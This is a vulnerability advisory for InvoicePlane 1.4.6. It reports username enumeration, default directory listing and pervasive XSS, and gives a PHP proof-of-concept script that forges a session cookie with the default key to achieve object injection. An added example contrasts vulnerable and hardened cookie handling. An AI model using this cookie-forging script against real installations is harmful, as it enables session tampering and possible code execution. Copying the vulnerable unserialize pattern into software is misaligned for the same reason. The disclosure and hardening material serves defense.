software:		InvoicePlane
version: 		1.4.6
URL:			https://invoiceplane.com/

Researcher:		Ross Marks
URL: 			http://www.rossmarks.co.uk

1) username enumeration
	the login form returns a different error depending on whether the email exists,
	so registered addresses can be confirmed one by one:
	wrong username: There is no account registered with this Email address.
	wrong password: Email or Password incorrect.

2) directory listing enabled by default
	/invoice_plane/uploads/
	/invoice_plane/assets/

3) Persistent & Reflected XSS everywhere
	there is NO XSS protection (output encoding) implemented

4) Object Injection via session cookie
   example: set the output of the following script as the session cookie
   (the cookie is urlencode(serialize($obj)) followed by an HMAC-SHA1 of the
   serialized data under the application's encryption key):

		<?php
		/***
		 * change these to reflect environment
		 */
			$private_key = "invoiceplane";

			// any class known to the application can be substituted here
			class objName {
				public $var = "content";
			}
		/***
		 * change $obj to reflect class, leave everything else
		 */
			$obj = new objName();
			$serialized = serialize($obj);
			// the HMAC covers the raw serialized string, not the urlencoded form
			$hash = hash_hmac('sha1', $serialized, $private_key);
			echo urlencode($serialized) . $hash . "\n";
		?>
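The following is an added example, not InvoicePlane's code: a minimal model of the
server side that consumes a cookie of the shape produced by the script above, shown
once in the vulnerable form (any class accepted once the MAC matches, MAC compared
with ==) and once hardened (constant-time MAC check, unserialize() forbidden from
creating objects). The class name Example, the function names and the key
"invoiceplane" are assumptions for illustration.

```php
<?php
// Added example (not InvoicePlane code). Models a server that reads a cookie built as
// urlencode(serialize($data)) . hash_hmac('sha1', serialize($data), $key).

class Example {
    public $var = "content";
    public function __wakeup() {
        // Any application class with __wakeup()/__destruct() becomes a gadget once
        // attacker-controlled serialized data reaches unserialize().
        echo "__wakeup() ran: object injection succeeded\n";
    }
}

// Split cookie into (urldecoded payload, hex MAC). A SHA-1 HMAC is 40 hex chars.
function split_cookie(string $cookie): ?array {
    if (strlen($cookie) <= 40) {
        return null;
    }
    $payload = urldecode(substr($cookie, 0, -40));
    $mac = substr($cookie, -40);
    return [$payload, $mac];
}

// Vulnerable: once the MAC matches, whatever class the payload names is instantiated.
function read_cookie_vulnerable(string $cookie, string $key) {
    $parts = split_cookie($cookie);
    if ($parts === null) {
        return false;
    }
    [$payload, $mac] = $parts;
    if (hash_hmac('sha1', $payload, $key) == $mac) {   // loose, non-constant-time compare
        return unserialize($payload);                   // objects allowed: gadget runs
    }
    return false;
}

// Hardened: constant-time MAC comparison, and unserialize() may only yield scalars/arrays
// (serialized objects come back as __PHP_Incomplete_Class, __wakeup() never runs).
// Better still: keep only an opaque session ID in the cookie, or use json_decode().
function read_cookie_hardened(string $cookie, string $key) {
    $parts = split_cookie($cookie);
    if ($parts === null) {
        return false;
    }
    [$payload, $mac] = $parts;
    if (!hash_equals(hash_hmac('sha1', $payload, $key), $mac)) {
        return false;
    }
    $data = unserialize($payload, ['allowed_classes' => false]);
    if (!is_array($data)) {
        return false;   // reject anything that is not a plain session array
    }
    return $data;
}

// Forge a cookie the same way the PoC above does, using the weak default key.
$key = "invoiceplane";
$serialized = serialize(new Example());
$forged = urlencode($serialized) . hash_hmac('sha1', $serialized, $key);

var_dump(read_cookie_vulnerable($forged, $key));  // __wakeup() fires, Example object returned
var_dump(read_cookie_hardened($forged, $key));    // bool(false): object payload rejected
```

Note that the MAC alone does not help here: it only proves the sender knew the key, and
a default or guessable key (as in the PoC) is effectively public. The fix is to stop
trusting the cookie to name classes at all, not just to check the MAC more carefully.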